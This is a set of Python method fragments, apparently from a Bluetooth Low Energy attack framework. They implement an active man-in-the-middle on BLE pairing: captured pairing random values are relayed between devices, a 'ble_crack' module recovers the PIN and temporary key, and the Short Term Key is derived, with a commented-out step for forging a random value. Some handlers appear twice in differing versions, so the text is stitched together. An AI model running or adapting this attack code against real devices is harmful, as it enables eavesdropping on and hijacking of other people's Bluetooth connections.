def masterPairingRandom(self, packet): if self.getStage() == BLEMitmStage.ACTIVE_MITM: io.info("Pairing Random (from master) : random = " + packet.random.hex()) io.info("Storing mRand : " + packet.random.hex()) self.mRand = packet.random[::-1] m = utils.loadModule("ble_crack") m["MASTER_RAND"] = self.mRand.hex() m["PAIRING_REQUEST"] = self.pReq.hex() m["PAIRING_RESPONSE"] = self.pRes.hex() m["INITIATOR_ADDRESS_TYPE"] = "public" if self.initiatorAddressType == b"\x00" else "random" m["INITIATOR_ADDRESS"] = self.initiatorAddress m["RESPONDER_ADDRESS_TYPE"] = "public" if self.responderAddressType == b"\x00" else "random" m["RESPONDER_ADDRESS"] = self.responderAddress m["MASTER_CONFIRM"] = self.mConfirm.hex() output = m.run() if output["success"]: self.pin = int(output["output"]["PIN"]) self.temporaryKey = bytes.fromhex( output["output"]["TEMPORARY_KEY"]) else: self.pin = 0 self.temporaryKey = b"\x00" * 16 io.info("Redirecting to slave ...") self.a2sEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def slavePairingRandom(self,packet): if self.getStage() == BLEMitmStage.ACTIVE_MITM: io.info("Pairing Random (from slave) : random = "+packet.random.hex()) io.info("Storing sRand : "+packet.random.hex()) self.sRand = packet.random[::-1] io.info("Redirecting to master ...") self.a2mEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def slavePairingRandom(self, packet): if self.getStage() == BLEMitmStage.ACTIVE_MITM: io.info("Pairing Random (from slave) : random = " + packet.random.hex()) io.info("Storing sRand : " + packet.random.hex()) self.sRand = packet.random[::-1] io.info("Redirecting to master ...") #newRandom = ble.BLECrypto.c1m1(self.temporaryKey,self.sConfirm,self.pReq,self.pRes,self.initiatorAddressType,self.initiatorAddress,self.responderAddressType,self.responderAddress) #self.forgedsRand = newRandom #io.info("Using fake random : "+newRandom.hex()) self.a2mEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def masterPairingRandom(self, pkt): pkt.show() self.mRand = pkt.random response = ble.BLEPairingRandom(random=self.sRand) self.emitter.sendp(response) mConfirm = ble.BLECrypto.c1(self.tk, self.mRand[::-1], self.pReq, self.pRes, self.initiatorAddressType, self.initiatorAddress, self.responderAddressType, self.responderAddress) if self.mConfirm == mConfirm: io.success("Confirm Value correct !") self.stk = ble.BLECrypto.s1(self.tk, self.mRand[::-1], self.sRand[::-1]) io.success("Generating Short Term Key (STK): " + self.stk.hex()) else: io.fail("Confirm value failed ! Terminating ...") self.failure = True
def slavePairingConfirm(self, pkt): pkt.show() self.sConfirm = pkt.confirm[::-1] response = ble.BLEPairingRandom(random=self.mRand) response.show() self.emitter.sendp(response)